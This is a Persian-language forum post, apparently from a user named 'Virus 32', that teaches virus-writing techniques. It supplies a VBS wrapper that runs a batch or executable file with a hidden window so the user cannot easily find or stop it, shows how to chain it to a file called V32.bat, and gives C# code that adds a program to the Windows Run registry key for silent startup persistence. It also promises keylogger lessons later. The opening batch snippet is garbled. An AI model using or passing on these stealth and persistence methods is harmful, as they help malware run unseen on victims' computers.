
Virus 32 :
سلام
سوال هایی که میپرسین یه رمان جوابشون میشه همیشه :)
اولی :
@echo off
CLS Netsh
CLS DHCP
CLS trace enable
Pause
که اگه Pause رو از خط آخر پاک کنی موقع اجرا ، سی ام دی رو هم نشون نمیده (اونو نوشتم خودت ببینی اخطاری نداشته باشه بعد پاکش کنی)
سوال دوم :
خودم همیشه ابتدا یه vbs برای مخفی کردن برنامه ها درست میکردم (یجور مخفی گاه) بعد برنامه های bat یا exe رو با اون فراخوانی میکردم
اگه بتونی این روش رو به درستی انجام بدی تقریبا یه شاهکار در نوع خودشه چون از تسک منیجر هم غیر فعال کردنش سخت میشه :)
کدهای vbs
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
کدهای بالا رو با نام makhfi.vbs ذخیره میکنیم
حالا فرض کن یه برنامه ی bat با نام V32.bat رو میخواییم مخفی اجراش کنیم
به خط اول این ویروسمون یعنی v32.bat کد زیر رو اضافه میکنیم
wscript.exe "C:\makhfi.vbs" "C:\V32.bat"
میتونیم بجای V32.bat هر برنامه ی دیگه ای رو هم بنویسیم مثلا V32.exe یا ...
اگه با سی شارپ آشنایی داری میتونیم از کدهای زیر برای اجرای مخفی برنامه مون کمک بگیریم
که برنامه بطور اتوماتیک و پنهان وارد استارت آپ میشه
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey
("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("Namebarname", Application.ExecutablePath);
که در کدهای بالا کلید ریجستری از مسیر زیر استخراج شده
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ویروس و کیلاگر نویسی به زبان
سی شارپ رو بعدا مفصل کار میکنیم باهم :)
امیدوارم مفید بوده باشه
ویروس میخواستم راجع به کد های پاپ آپ یکم توضیح بدین
اینکه چجوری و کجا بزاریم؟؟